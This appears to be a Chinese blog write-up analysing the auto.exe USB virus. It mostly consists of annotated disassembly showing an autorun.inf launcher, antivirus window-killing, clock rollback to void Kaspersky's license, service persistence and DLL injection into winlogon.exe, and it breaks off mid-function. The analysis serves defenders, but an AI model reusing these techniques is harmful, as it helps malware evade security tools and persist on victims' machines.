• 代码恰似故事书 列数病毒七宗罪

【作者】 cyclotron

【邮箱】 cyclotron at citiz.net

【主页】 http://cyclotron.yculblog.com

【背景】

    很久以前就听说有利用 Kaspersky 的 License 弱点来对付杀软的病毒出现,因为冲浪比较小心,一直未曾谋面,然而近日上网却不慎屡次正面交锋,虽然在影子系统的护航下系统免受其害,但又忍不住好奇细细解剖了一番,权作笔记,以飨饱受其苦的网友。
    病毒乍看起来没什么特别之处,主程序名为 auto.exe,通常会以隐藏文件的形式埋伏于每个盘的根目录下,辅以久负盛名的 autorun.inf,随着用户打开浏览器的操作悄悄渗入系统:
    
[AutoRun]
open=auto.exe
shellexecute=auto.exe
shell\Auto\command=auto.exe

    脱掉主程序的 Upack 紧身衣,翻开代码故事的第一章:
    
0040216F _WinMain@16     proc near               ; CODE XREF: start+12Fp
0040216F
0040216F var_41C         = dword ptr -41Ch
0040216F lpVirusPathName = byte ptr -31Ch
0040216F var_VirusName   = dword ptr -21Ch
0040216F var_11C         = dword ptr -11Ch
0040216F ThreadId        = dword ptr -1Ch
0040216F ServiceStartTable= SERVICE_TABLE_ENTRYA ptr -18h
0040216F var_10          = dword ptr -10h
0040216F var_C           = dword ptr -0Ch
0040216F dwSysOpVer      = dword ptr -8
0040216F var_SysInfectFlag= dword ptr -4
0040216F arg_szCmdLine   = dword ptr  10h
0040216F
0040216F                 push    ebp
00402170                 mov     ebp, esp
00402172                 sub     esp, 41Ch
00402178                 push    ebx
00402179                 push    esi
0040217A                 mov     esi, offset byte_410F20
0040217F                 push    edi
00402180                 mov     ebx, offset dword_410D4C ; 接下去要清零的结构
00402185                 push    esi
00402186                 push    ebx
00402187                 call    sprintf         ; 一连串sprintf把410D4C处的32h个dword清零初始化

…………………………
…………………………

004023FE                 call    sprintf
00402403                 push    esi
00402404                 push    ebx
00402405                 call    sprintf
0040240A                 call    GetSystemVersion ; 取得操作系统版本
0040240F                 mov     [ebp+dwSysOpVer], eax
00402412                 mov     al, ds:byte_410F20
00402417                 push    3Fh
00402419                 mov     byte ptr [ebp+var_VirusName], al
0040241F                 pop     ecx
00402420                 xor     eax, eax
00402422                 lea     edi, [ebp+var_VirusName+1]
00402428                 push    esi
00402429                 rep stosd
0040242B                 stosw
0040242D                 lea     eax, [ebp+var_VirusName]
00402433                 push    eax
00402434                 call    strcpy          ; 把自己的名字copy一下
00402439                 lea     eax, [ebp+var_VirusName]
0040243F                 push    offset aAu      ; "au"
00402444                 push    eax
00402445                 call    strcat
0040244A                 lea     eax, [ebp+var_VirusName]
00402450                 push    offset aTo_e    ; "to.e"
00402455                 push    eax
00402456                 call    strcat
0040245B                 add     esp, 40h
0040245E                 lea     eax, [ebp+var_VirusName]
00402464                 push    offset aXe      ; "xe"
00402469                 push    eax
0040246A                 call    strcat

【第一宗罪】 卡巴终结者

    大多数病毒为躲避杀软的追击,往往使出各种手段隐匿自身代码和文件,RootKit、多态变形等种种层出不穷。然而我们这里的主角面对卡巴毫无惧色,主动出击剿灭卡巴的进程和窗口,意欲一除之而后快,堂堂卡巴面对如此对手,也只能玩起 Tom&Jerry 的游戏,至少在笔者的电脑上,卡巴剿之不及,auto.exe大有春风吹又生之势。

0040246F                 pop     ecx
00402470                 lea     eax, [ebp+ThreadId]
00402473                 pop     ecx
00402474                 push    eax             ; lpThreadId
00402475                 xor     eax, eax
00402477                 push    eax             ; dwCreationFlags
00402478                 push    eax             ; lpParameter
00402479                 push    offset lpAntiAVThread ; lpStartAddress

{
  00402105
  00402105
  00402105 lpAntiAVThread  proc near
  00402106                 push    ebp
  00402107                 push    esi
  00402108                 mov     esi, ds:FindWindowExA
  0040210E                 push    edi
  0040210F                 mov     edi, ds:SendMessageA
  00402115                 xor     ebx, ebx
  00402117
  00402117 loc_402117:
  00402117                 push    ebx             ; lParam
  00402118                 push    offset EnumFunc ; lpEnumFunc
  0040211D                 call    ds:EnumWindows  ; 穷举AV窗口
  00402123                 push    64h             ; dwMilliseconds
  00402125                 call    ds:Sleep
  0040212B                 push    offset byte_410BB0 ; LPCSTR
  00402130                 push    offset a32770   ; LPCSTR
  00402135                 push    ebx             ; HWND
  00402136                 push    ebx             ; HWND
  00402137                 call    esi ; FindWindowExA
  00402139                 cmp     eax, ebx
  0040213B                 jz      short loc_402162
  0040213D                 push    offset aY       ; LPCSTR
  00402142                 push    offset aButton  ; LPCSTR
  00402147                 push    ebx             ; HWND
  00402148                 push    eax             ; HWND
  00402149                 call    esi ; FindWindowExA ; 找到"是(&Y)"按钮
  0040214B                 push    ebx             ; lParam
  0040214C                 mov     ebp, eax
  0040214E                 push    1               ; wParam
  00402150                 push    WM_LBUTTONDOWN  ; Msg
  00402155                 push    ebp             ; hWnd
  00402156                 call    edi ; SendMessageA ; 发送鼠标点击消息
  00402158                 push    ebx             ; lParam
  00402159                 push    ebx             ; wParam
  0040215A                 push    WM_LBUTTONUP    ; Msg
  0040215F                 push    ebp             ; hWnd
  00402160                 call    edi ; SendMessageA
  00402162
  00402162 loc_402162:
  00402162                 push    7D0h            ; dwMilliseconds
  00402167                 call    ds:Sleep
  0040216D                 jmp     short loc_402117 ; 反复执行守护线程
  0040216D lpAntiAVThread  endp                    ; 一旦发现AV启动立即主动出击剿灭之
}

0040247E                 push    eax             ; dwStackSize
0040247F                 push    eax             ; lpThreadAttributes
00402480                 call    ds:CreateThread ; 启动Anti-AV守护线程
00402486                 mov     edi, ds:Sleep
0040248C                 push    3E8h            ; dwMilliseconds
00402491                 call    edi ; Sleep
00402493                 and     [ebp+var_SysInfectFlag], 0
00402497                 push    esi


00402758                 push    offset aDd33gsd2 ; "dd33gsd2"
0040275D                 call    strcpy
00402762                 lea     eax, [ebp+var_11C]
00402768                 push    eax
00402769                 lea     eax, [ebp+var_11C]
0040276F                 push    eax
00402770                 call    sub_402E93
00402775                 lea     eax, [ebp+var_11C]
0040277B                 push    eax
0040277C                 push    offset aDd33gsd2_exe_0 ; "dd33gsd2.exe"
00402781                 call    strcpy
00402786                 push    offset a_exe    ; ".EXE"
0040278B                 push    offset aDd33gsd2_exe_0 ; "dd33gsd2.exe"
00402790                 call    strcat          ; 以VolumeSerialNumber命名exe
00402795                 lea     eax, [ebp+var_11C]
0040279B                 push    eax
0040279C                 lea     eax, [ebp+var_11C]
004027A2                 push    eax
004027A3                 call    sub_402E93
004027A8                 add     esp, 28h
004027AB                 push    1               ; dwMilliseconds
004027AD                 call    edi ; Sleep
004027AF                 lea     eax, [ebp+var_11C]
004027B5                 push    eax
004027B6                 push    offset aDd33gsd2_dll ; "dd33gsd2.dll"
004027BB                 call    strcpy
004027C0                 push    offset a_dll    ; ".DLL"
004027C5                 push    offset aDd33gsd2_dll ; "dd33gsd2.dll"
004027CA                 call    strcat          ; 以VolumeSerialNumber命名Dll
004027CF                 add     esp, 10h
004027D2                 lea     eax, [ebp+var_11C]
004027D8                 push    eax
004027D9                 push    offset dword_410E1C
004027DE                 call    ds:lstrcpy


【第二宗罪】 主动开启浏览器,放行autorun.inf

    autorun.inf 并不是本文主角的专利,早在春秋战国时期就已经成为各路病毒愚弄菜菜的常备武器。然而在大家都是静候菜菜插入优盘,打开浏览器之时,auto.exe 却再次主动出击,迫不及待地打开浏览器,为 autorun.inf 开路。

0040281C                 lea     eax, [ebp+lpVirusPathName]
00402822                 push    104h            ; nSize
00402827                 push    eax             ; lpFilename
00402828                 push    0               ; hModule
0040282A                 call    ds:GetModuleFileNameA ; 取得病毒当前路径
00402830                 test    eax, eax
00402832                 jnz     short loc_40283C
00402834                 push    1
00402836                 pop     eax
00402837                 jmp     loc_402C04
0040283C ; ----------------------------------------------------------------------------
0040283C
0040283C loc_40283C:                             ; CODE XREF: WinMain(x,x,x,x)+6C3j
0040283C                 lea     eax, [ebp+var_VirusName]
00402842                 push    eax
00402843                 lea     eax, [ebp+lpVirusPathName]
00402849                 push    eax
0040284A                 call    strstr          ; 检索病毒文件字符串 auto.exe
0040284F                 pop     ecx
00402850                 test    eax, eax
00402852                 pop     ecx
00402853                 jz      short loc_4028A7 ; emmm...
00402853                                         ; 老毒物没有在当前根目录下找到auto.exe
00402853                                         ; 说明已经感染到系统目录下了
00402855                 lea     eax, [ebp+lpVirusPathName]
0040285B                 push    eax
0040285C                 call    strlen
00402861                 cmp     eax, 2
00402864                 pop     ecx
00402865                 jbe     short loc_4028A7
00402867                 movsx   eax, [ebp+lpVirusPathName]
0040286E                 push    eax
0040286F                 lea     eax, [ebp+lpVirusPathName]
00402875                 push    offset aC       ; "%c:\\"
0040287A                 push    eax
0040287B                 mov     [ebp+var_SysInfectFlag], 1
00402882                 call    sprintf         ; 生成所在根目录字符串,如C:\
00402887                 add     esp, 0Ch
0040288A                 lea     eax, [ebp+lpVirusPathName]
00402890                 push    1               ; nShowCmd
00402892                 push    0               ; lpDirectory
00402894                 push    eax             ; lpParameters
00402895                 push    offset aExplorer_exe ; lpFile
0040289A                 push    offset aOpen    ; lpOperation
0040289F                 push    0               ; hwnd
004028A1                 call    ds:ShellExecuteA ; 用Explorer.exe打开该根目录
004028A1                                         ; 由于inf文件的存在此时会自动
004028A1                                         ; 执行auto.exe

【第三宗罪】 时光倒流

    这一招可是再次刺痛了卡巴的要害。。。(卡巴:auto 啊 auto,我俩本无瓜葛,你为何就如此针对我捏? >.<)

004028A7 loc_4028A7:
004028A7 
004028A7                 call    FoolKaspersky

{
  00401000 FoolKaspersky   proc near
  00401000
  00401000 SystemTime      = SYSTEMTIME ptr -10h
  00401000
  00401000                 push    ebp
  00401001                 mov     ebp, esp
  00401003                 sub     esp, 10h
  00401006                 push    esi
  …………………………
  …………………………
  00401298                 push    offset aAvp_exe ; "avp.exe"
  0040129D                 call    CountAVP        ; 查找AVP相关的进程数
  004012A2                 add     esp, 2Ch
  004012A5                 test    eax, eax
  004012A7                 pop     edi
  004012A8                 pop     esi
  004012A9                 jg      short loc_4012B0 ; 当进程数不为0时
  004012A9                                         ; 修改系统时间使AVP License失效
  004012AB                 or      eax, 0FFFFFFFFh
  004012AE                 leave
  004012AF                 retn
  004012B0 ; ----------------------------------------------------------------------------
  004012B0
  004012B0 loc_4012B0: 
  004012B0                 lea     eax, [ebp+SystemTime] ; 当进程数不为0时
  004012B0                                         ; 修改系统时间使AVP License失效
  004012B3                 push    eax             ; lpSystemTime
  004012B4                 call    ds:GetSystemTime
  004012BA                 cmp     [ebp+SystemTime.wYear], 7D5h
  004012C0                 jbe     short loc_4012D2
  004012C2                 lea     eax, [ebp+SystemTime]
  004012C5                 mov     [ebp+SystemTime.wYear], 7D5h
  004012CB                 push    eax             ; lpSystemTime
  004012CC                 call    ds:SetSystemTime
  004012D2
  004012D2 loc_4012D2:
  004012D2                 push    4E20h           ; dwMilliseconds
  004012D7                 call    ds:Sleep
  004012DD                 push    1
  004012DF                 pop     eax
  004012E0                 leave
  004012E1                 retn
  004012E1 FoolKaspersky   endp
}

004028AC                 cmp     [ebp+dwSysOpVer], VER_PLATFORM_WIN32_NT
004028B0                 jnz     loc_402BEF      ; 如果是Win9x,下面的部分就可以幸免了
004028B6                 push    0FFh
004028BB                 lea     eax, [ebp+var_41C]
004028C1                 push    0
004028C3                 push    eax
004028C4                 call    memset          ; 填零初始化

【第四宗罪】 伪装系统服务派发员

    auto.exe 不是街头混混,出手如此大气,足见其志在高远。只可惜笔者这块内容生疏,回头恶补 MSDN 再奉上。。。

004028BB                 lea     eax, [ebp+var_41C]
004028C1                 push    0
004028C3                 push    eax
004028C4                 call    memset          ; 填零初始化
004028C9                 add     esp, 0Ch
004028CC                 lea     eax, [ebp+var_41C]
004028D2                 push    offset aDd33gsd2_exe_0 ; "dd33gsd2.exe"
004028D7                 push    eax
004028D8                 call    ds:lstrcpy      ; 复制刚才根据VolumeSerialNumber
004028D8                                         ; 生成的[VolumeSerialNumber].exe名称
004028DE                 lea     eax, [ebp+var_41C]
004028E4                 push    1
004028E6                 push    eax
004028E7                 call    CopySelfToSysDir_As_VSNexe ;
004028E7                                         ; 把自身以[VolumeSerialNumber].exe
004028E7                                         ; 为名复制到系统目录
004028EC                 push    offset aK       ; "-k"
004028F1                 push    [ebp+arg_szCmdLine]
004028F4                 call    strstr          ; 是否存在命令行参数 -k?
004028F9                 add     esp, 10h
004028FC                 test    eax, eax
004028FE                 jz      loc_402BB1
00402904                 xor     edi, edi        ; 没有,接下去把系统目录下的
00402904                                         ; 病毒体注册为服务
00402906                 push    esi
00402907                 push    ebx
00402908                 mov     [ebp+ServiceStartTable.lpServiceName], offset aDd33gsd2_1 ; "dd33gsd2"
0040290F                 mov     [ebp+ServiceStartTable.lpServiceProc], offset VirusServiceProc
{
  004019D1 VirusServiceProc proc near
  004019D1
  004019D1 ThreadId        = dword ptr -108h
  004019D1 ServiceName     = byte ptr -104h
  …………………………
  …………………………
  00401CA5                 push    40h
  00401CA7                 mov     [esp+144h+ServiceName], al
  00401CAB                 pop     ecx
  00401CAC                 xor     eax, eax
  00401CAE                 lea     edi, [esp+3Dh]
  00401CB2                 rep stosd
  00401CB4                 stosw
  00401CB6                 stosb
  00401CB7                 lea     eax, [esp+140h+ServiceName]
  00401CBB                 push    offset aDd33gsd2_1 ; "dd33gsd2"
  00401CC0                 push    eax
  00401CC1                 call    strcpy
  00401CC6                 add     esp, 30h
  00401CC9                 lea     eax, [esp+118h+ServiceName]
  00401CCD                 push    offset HandlerProc ; lpHandlerProc
  00401CD2                 push    eax             ; lpServiceName
  00401CD3                 call    ds:RegisterServiceCtrlHandlerA
  00401CD9                 mov     ds:hServiceStatus, eax
  00401CDE                 call    ds:GetLastError
  00401CE4                 mov     eax, ds:hServiceStatus
  00401CE9                 cmp     eax, ebp
  00401CEB                 jz      loc_40200D
  00401CF1                 mov     edi, ds:SetServiceStatus
  00401CF7                 push    offset stru_410D30 ; lpServiceStatus
  00401CFC                 push    eax             ; hServiceStatus
  00401CFD                 mov     ds:stru_410D30.dwCurrentState, 4
  00401D07                 call    edi ; SetServiceStatus
  …………………………
  …………………………
  00401F8F                 lea     eax, [esp+118h+ThreadId]
  00401F93                 push    eax             ; lpThreadId
  00401F94                 push    ebp             ; dwCreationFlags
  00401F95                 push    ebp             ; lpParameter
  00401F96                 push    offset InjectDll2Winlogon ; lpStartAddress
  00401F9B                 push    ebp             ; dwStackSize
  00401F9C                 push    ebp             ; lpThreadAttributes
  00401F9D                 call    ds:CreateThread
  00401FA3                 cmp     ds:dword_410F1C, ebp
  00401FA9                 mov     esi, ds:Sleep
  00401FAF                 push    1
  00401FB1                 pop     ebx
  00401FB2                 jnz     short loc_401FC6
  00401FB4
  00401FB4 loc_401FB4:
  00401FB4                 push    ebx             ; dwMilliseconds
  00401FB5                 call    esi ; Sleep
  00401FB7                 push    12Ch            ; dwMilliseconds
  00401FBC                 call    esi ; Sleep
  00401FBE                 cmp     ds:dword_410F1C, ebp
  00401FC4                 jz      short loc_401FB4
  00401FC6
  00401FC6 loc_401FC6:
  00401FC6                 cmp     ds:stru_410D30.dwCurrentState, 4
  00401FCD                 jnz     short loc_40200D
  00401FCF                 push    offset stru_410D30 ; lpServiceStatus
  00401FD4                 mov     ds:stru_410D30.dwServiceType, 110h
  00401FDE                 push    ds:hServiceStatus ; hServiceStatus
  00401FE4                 mov     ds:stru_410D30.dwCurrentState, ebx
  00401FEA                 mov     ds:stru_410D30.dwControlsAccepted, ebx
  00401FF0                 mov     ds:stru_410D30.dwWin32ExitCode, ebp
  00401FF6                 mov     ds:stru_410D30.dwCheckPoint, ebp
  00401FFC                 mov     ds:stru_410D30.dwWaitHint, ebp
  00402002                 call    edi ; SetServiceStatus
  00402004                 push    7530h           ; dwMilliseconds
  00402009                 call    esi ; Sleep
  0040200B                 jmp     short loc_401FC6
  0040200D ; ----------------------------------------------------------------------------
  0040200D
  0040200D loc_40200D:
  0040200D                 pop     edi
  0040200E                 pop     esi
  0040200F                 pop     ebp
  00402010                 pop     ebx
  00402011                 add     esp, 108h
  00402017                 retn
  00402017 VirusServiceProc endp
}
00402916                 mov     [ebp+var_10], edi
00402919                 mov     [ebp+var_C], edi
…………………………
…………………………
00402BA0                 lea     eax, [ebp+ServiceStartTable]
00402BA3                 push    eax             ; lpServiceStartTable
00402BA4                 call    ds:StartServiceCtrlDispatcherA ; 注册病毒线程为ServiceDispatcher
00402BAA                 neg     eax
00402BAC                 sbb     eax, eax
00402BAE                 inc     eax
00402BAF                 jmp     short loc_402C04

【第五宗罪】  注入系统进程,Hook 无处不在

    在上面的 ServiceDispatcher 中,最辣手的一招绝非伪装派遣本身,而是隐含在其中的远程代码注入,auto.exe 的病毒体中附带了一个真正用来干坏事的Dll,在伪装派遣的过程中以卷标号命名,被释放到系统目录下,当然同时被释放过去的还有病毒体本身,一搭一挡构成了下面注册系统服务的文件。在清除的过程中,最难对付的非该Dll莫属。一旦被注册到系统服务,该Dll就会注入到大量的系统进程中,随时监视和刷新对它不利的操作,在该Dll被释放之前,任何对其注册表项的修改都会遭到即时反攻,令对手除之而不能。
    
0040183D ; DWORD __stdcall InjectDll2Winlogon(LPVOID)
0040183D InjectDll2Winlogon proc near
0040183D
0040183D var_szExeName   = dword ptr -308h
0040183D var_szSysDir    = byte ptr -208h
0040183D var_szDllName   = byte ptr -108h
0040183D NumberOfBytesWritten= dword ptr -8
0040183D var_OpSysVer    = dword ptr -4
0040183D
0040183D                 push    ebp
0040183E                 mov     ebp, esp
00401840                 sub     esp, 308h
00401846                 push    esi
00401847                 push    edi
00401848                 call    GetSystemVersion
0040184D                 mov     esi, ds:GetSystemDirectoryA
00401853                 mov     [ebp+var_OpSysVer], eax
00401856                 mov     edi, 0FFh
0040185B                 lea     eax, [ebp+var_szSysDir]
00401861                 push    edi             ; uSize
00401862                 push    eax             ; lpBuffer
00401863                 call    esi ; GetSystemDirectoryA
00401865                 test    eax, eax
00401867                 jz      loc_401974
0040186D                 lea     eax, [ebp+var_szSysDir]
00401873                 push    edi             ; uSize
00401874                 push    eax             ; lpBuffer
00401875                 call    esi ; GetSystemDirectoryA
00401877                 test    eax, eax
00401879                 jz      loc_401974
0040187F                 lea     eax, [ebp+var_szSysDir]
00401885                 push    eax
00401886                 lea     eax, [ebp+var_szDllName]
0040188C                 push    eax
0040188D                 call    strcpy
00401892                 mov     esi, offset asc_410B74 ; "\\"
00401897                 lea     eax, [ebp+var_szDllName]
0040189D                 push    esi
0040189E                 push    eax
0040189F                 call    strcat
004018A4                 lea     eax, [ebp+var_szDllName]
004018AA                 push    offset aDd33gsd2_dll ; "dd33gsd2.dll"
004018AF                 push    eax
004018B0                 call    strcat
004018B5                 add     esp, 18h
004018B8                 lea     eax, [ebp+var_szSysDir]
004018BE                 push    eax
004018BF                 lea     eax, [ebp+var_szExeName]
004018C5                 push    eax
004018C6                 call    ds:lstrcpy
004018CC                 lea     eax, [ebp+var_szExeName]
004018D2                 push    esi
004018D3                 push    eax
004018D4                 call    strcat
004018D9                 lea     eax, [ebp+var_szExeName]
004018DF                 push    offset aDd33gsd2_exe ; "dd33gsd2.exe"
004018E4                 push    eax
004018E5                 call    strcat
004018EA                 add     esp, 10h
004018ED                 xor     edi, edi
004018EF                 lea     eax, [ebp+var_szDllName]
004018F5                 push    edi             ; hTemplateFile
004018F6                 push    edi             ; dwFlagsAndAttributes
004018F7                 push    2               ; dwCreationDisposition
004018F9                 push    edi             ; lpSecurityAttributes
004018FA                 push    edi             ; dwShareMode
004018FB                 push    40000000h       ; dwDesiredAccess
00401900                 push    eax             ; lpFileName
00401901                 call    ds:CreateFileA
00401907                 mov     esi, eax
00401909                 cmp     esi, 0FFFFFFFFh
0040190C                 jz      short loc_401924
0040190E                 lea     eax, [ebp+NumberOfBytesWritten]
00401911                 push    edi             ; lpOverlapped
00401912                 push    eax             ; lpNumberOfBytesWritten
00401913                 push    0B000h          ; nNumberOfBytesToWrite
00401918                 push    offset byte_405010 ; lpBuffer
0040191D                 push    esi             ; hFile
0040191E                 call    ds:WriteFile    ; 建立[VolumeSerialNumber].dll
00401924
00401924 loc_401924:
00401924                 push    ebx
00401925                 push    esi             ; hObject
00401926                 call    ds:CloseHandle
0040192C                 cmp     [ebp+var_OpSysVer], VER_PLATFORM_WIN32_NT
00401930                 mov     esi, ds:Sleep
00401936                 push    1
00401938                 mov     edi, 0BB8h
0040193D                 pop     ebx
0040193E                 jnz     short loc_40196A
00401940                 push    0
00401942                 push    offset aWinlogon_exe ; "winlogon.exe"
00401947                 call    FindSpecificProcess ; 查找winlogon.exe进程
0040194C                 pop     ecx
0040194D                 test    eax, eax
0040194F                 pop     ecx
00401950                 jz      short loc_401961
00401952                 push    eax
00401953                 lea     eax, [ebp+var_szDllName]
00401959                 push    eax
0040195A                 call    Inject_winlogon_exe ; 将[VolumeSerialNumber].dll注入winlogon.exe
0040195F                 pop     ecx
00401960                 pop     ecx
00401961
00401961 loc_401961:
00401961                 push    edi             ; dwMilliseconds
00401962                 call    esi ; Sleep
00401964                 mov     ds:dword_410F1C, ebx
0040196A
0040196A loc_40196A:
0040196A                 push    edi             ; dwMilliseconds
0040196B                 call    esi ; Sleep
0040196D                 mov     ds:dword_410F1C, ebx
00401973                 pop     ebx
00401974
00401974 loc_401974:
00401974                 pop     edi
00401975                 pop     esi
00401976                 leave
00401977                 retn
00401977 InjectDll2Winlogon endp


【第六宗罪】  注册系统服务,启动无影无踪

    前面说道 auto.exe 志存高远,早已放弃同行广泛采用的自启动,而改用系统服务的方式深深侵入到系统的脊髓,加上远程注入Dll全程护航,普通的清除方式已经难以奏效。在被感染的系统中,系统服务列表中会增加一项以卷标号命名的自启动服务,其支持者恰为前面释放到系统目录的病毒体和Dll。

00402BB1
00402BB1 loc_402BB1:
00402BB1                 lea     eax, [ebp+var_41C]
00402BB7                 push    offset aK_0     ; " -k"
00402BBC                 push    eax
00402BBD                 call    ds:lstrcat
00402BC3                 push    1
00402BC5                 push    0BB8h
00402BCA                 lea     eax, [ebp+var_41C]
00402BD0                 push    offset dword_410E1C
00402BD5                 push    eax
00402BD6                 mov     esi, offset aDd33gsd2_1 ; "dd33gsd2"
00402BDB                 push    offset aDd33gsd2_0 ; "dd33gsd2"
00402BE0                 push    esi
00402BE1                 call    RegisterVirusService ; 注册病毒服务

{
  00402F83 RegisterVirusService proc near
  00402F83
  00402F83 var_110         = dword ptr -110h
  00402F83 pcbBytesNeeded  = dword ptr -10h
  00402F83 var_C           = dword ptr -0Ch
  00402F83 hSCManager      = dword ptr -8
  00402F83 hSCObject       = dword ptr -4
  00402F83 lpServiceName   = dword ptr  8
  00402F83 lpDisplayName   = dword ptr  0Ch
  00402F83 lpBinaryPathName= dword ptr  10h
  00402F83 arg_C           = dword ptr  14h
  00402F83 dwMilliseconds  = dword ptr  18h
  00402F83 arg_14          = dword ptr  1Ch
  00402F83
  00402F83                 push    ebp
  00402F84                 mov     ebp, esp
  00402F86                 sub     esp, 110h
  00402F8C                 mov     al, ds:byte_410F20
  00402F91                 push    ebx
  00402F92                 push    esi
  00402F93                 push    edi
  00402F94                 push    3Fh
  00402F96                 mov     byte ptr [ebp+var_110], al
  00402F9C                 pop     ecx
  00402F9D                 xor     eax, eax
  00402F9F                 lea     edi, [ebp+var_110+1]
  00402FA5                 push    offset aSystemCurr ; "SYSTEM\\Curr"
  00402FAA                 rep stosd
  00402FAC                 stosw
  00402FAE                 lea     eax, [ebp+var_110]
  00402FB4                 push    eax
  00402FB5                 call    ds:lstrcpy
  00402FBB                 mov     esi, ds:lstrcat
  00402FC1                 lea     eax, [ebp+var_110]
  00402FC7                 push    offset aEntcontrolse ; "entControlSe"
  00402FCC                 push    eax
  00402FCD                 call    esi ; lstrcat
  00402FCF                 lea     eax, [ebp+var_110]
  00402FD5                 push    offset aTServices ; "t\\Services\\"
  00402FDA                 push    eax
  00402FDB                 call    esi ; lstrcat
  00402FDD                 push    [ebp+lpServiceName]
  00402FE0                 lea     eax, [ebp+var_110]
  00402FE6                 push    eax
  00402FE7                 call    esi ; lstrcat
  00402FE9                 xor     edi, edi
  00402FEB                 mov     ebx, 0F01FFh
  00402FF0                 mov     esi, offset aDescription ; "Description"
  00402FF5
  00402FF5 loc_402FF5:
  00402FF5                 push    0F003Fh         ; dwDesiredAccess
  00402FFA                 push    edi             ; lpDatabaseName
  00402FFB                 push    edi             ; lpMachineName
  00402FFC                 call    ds:OpenSCManagerA ; Establish a connection to the service
  00402FFC                                         ; control manager on the specified computer
  00402FFC                                         ; and opens the specified database
  00403002                 cmp     eax, edi
  00403004                 mov     [ebp+hSCManager], eax
  00403007                 jz      loc_4030B9
  0040300D                 push    ebx             ; dwDesiredAccess
  0040300E                 push    [ebp+lpServiceName] ; lpServiceName
  00403011                 push    eax             ; hSCManager
  00403012                 call    ds:OpenServiceA
  00403018                 cmp     eax, edi
  0040301A                 mov     [ebp+hSCObject], eax
  0040301D                 jz      short loc_403088
  0040301F                 push    400h            ; uBytes
  00403024                 push    40h             ; uFlags
  00403026                 call    ds:LocalAlloc
  0040302C                 cmp     eax, edi
  0040302E                 mov     [ebp+var_C], eax
  00403031                 jz      short loc_403088
  00403033                 lea     ecx, [ebp+pcbBytesNeeded]
  00403036                 push    ecx             ; pcbBytesNeeded
  00403037                 push    400h            ; cbBufSize
  0040303C                 push    eax             ; lpServiceConfig
  0040303D                 push    [ebp+hSCObject] ; hService
  00403040                 call    ds:QueryServiceConfigA
  00403046                 test    eax, eax
  00403048                 jz      short loc_403088
  0040304A                 mov     eax, [ebp+var_C]
  0040304D                 cmp     dword ptr [eax+4], 2
  00403051                 jnz     short loc_40305B
  00403053                 mov     eax, [eax+0Ch]
  00403056                 cmp     eax, [ebp+lpBinaryPathName]
  00403059                 jz      short loc_403088
  0040305B
  0040305B loc_40305B:
  0040305B                 push    [ebp+lpDisplayName] ; lpDisplayName
  0040305E                 push    edi             ; lpPassword
  0040305F                 push    edi             ; lpServiceStartName
  00403060                 push    edi             ; lpDependencies
  00403061                 push    edi             ; lpdwTagId
  00403062                 push    edi             ; lpLoadOrderGroup
  00403063                 push    [ebp+lpBinaryPathName] ; lpBinaryPathName
  00403066                 push    0FFFFFFFFh      ; dwErrorControl
  00403068                 push    2               ; dwStartType
  0040306A                 push    10h             ; dwServiceType
  0040306C                 push    [ebp+hSCObject] ; hService
  0040306F                 call    ds:ChangeServiceConfigA
  00403075                 push    [ebp+arg_C]
  00403078                 lea     eax, [ebp+var_110]
  0040307E                 push    esi
  0040307F                 push    eax
  00403080                 call    SetVirusServiceKeys
  00403085                 add     esp, 0Ch
  00403088
  00403088 loc_403088:
  00403088                 push    edi             ; lpPassword
  00403089                 push    edi             ; lpServiceStartName
  0040308A                 push    edi             ; lpDependencies
  0040308B                 push    edi             ; lpdwTagId
  0040308C                 push    edi             ; lpLoadOrderGroup
  0040308D                 push    [ebp+lpBinaryPathName] ; lpBinaryPathName
  00403090                 push    1               ; dwErrorControl
  00403092                 push    2               ; dwStartType
  00403094                 push    10h             ; dwServiceType
  00403096                 push    ebx             ; dwDesiredAccess
  00403097                 push    [ebp+lpDisplayName] ; lpDisplayName
  0040309A                 push    [ebp+lpServiceName] ; lpServiceName
  0040309D                 push    [ebp+hSCManager] ; hSCManager
  004030A0                 call    ds:CreateServiceA
  004030A6                 push    [ebp+arg_C]
  004030A9                 lea     eax, [ebp+var_110]
  004030AF                 push    esi
  004030B0                 push    eax
  004030B1                 call    SetVirusServiceKeys
  004030B6                 add     esp, 0Ch
  004030B9
  004030B9 loc_4030B9:
  004030B9                 push    [ebp+hSCObject] ; hSCObject
  004030BC                 call    ds:CloseServiceHandle
  004030C2                 push    1               ; dwMilliseconds
  004030C4                 call    ds:Sleep
  004030CA                 push    [ebp+lpServiceName]
  004030CD                 lea     eax, [ebp+var_110]
  004030D3                 push    offset aDisplayname ; "DisplayName"
  004030D8                 push    eax
  004030D9                 call    SetVirusServiceKeys
  004030DE                 push    [ebp+arg_C]
  004030E1                 lea     eax, [ebp+var_110]
  004030E7                 push    esi
  004030E8                 push    eax
  004030E9                 call    SetVirusServiceKeys
  004030EE                 push    1
  004030F0                 lea     eax, [ebp+var_110]
  004030F6                 push    offset aErrorcontrol ; "ErrorControl"
  004030FB                 push    eax
  004030FC                 call    sub_402DC6
  00403101                 push    [ebp+lpBinaryPathName]
  00403104                 lea     eax, [ebp+var_110]
  0040310A                 push    offset aImagepath ; "ImagePath"
  0040310F                 push    eax
  00403110                 call    SetVirusServiceKeys
  00403115                 push    offset aLocalsystem ; "LocalSystem"
  0040311A                 lea     eax, [ebp+var_110]
  00403120                 push    offset aObjectname ; "ObjectName"
  00403125                 push    eax
  00403126                 call    SetVirusServiceKeys
  0040312B                 push    2
  0040312D                 lea     eax, [ebp+var_110]
  00403133                 push    offset aStart   ; "Start"
  00403138                 push    eax
  00403139                 call    sub_402DC6
  0040313E                 add     esp, 48h
  00403141                 lea     eax, [ebp+var_110]
  00403147                 push    10h
  00403149                 push    offset aType    ; "Type"
  0040314E                 push    eax
  0040314F                 call    sub_402DC6
  00403154                 add     esp, 0Ch
  00403157                 push    1
  00403159                 pop     eax
  0040315A                 cmp     [ebp+arg_14], eax
  0040315D                 jz      short loc_40316D
  0040315F                 push    [ebp+dwMilliseconds] ; dwMilliseconds
  00403162                 call    ds:Sleep
  00403168                 jmp     loc_402FF5
  0040316D ; ----------------------------------------------------------------------------
  0040316D
  0040316D loc_40316D:
  0040316D                 pop     edi
  0040316E                 pop     esi
  0040316F                 pop     ebx
  00403170                 leave
  00403171                 retn
  00403171 RegisterVirusService endp
}

00402BE6                 push    esi
00402BE7                 call    StartVirusService ; 启动病毒服务
{
  00402F3C StartVirusService proc near
  00402F3C
  00402F3C lpServiceName   = dword ptr  0Ch
  00402F3C
  00402F3C                 push    esi
  00402F3D                 push    edi
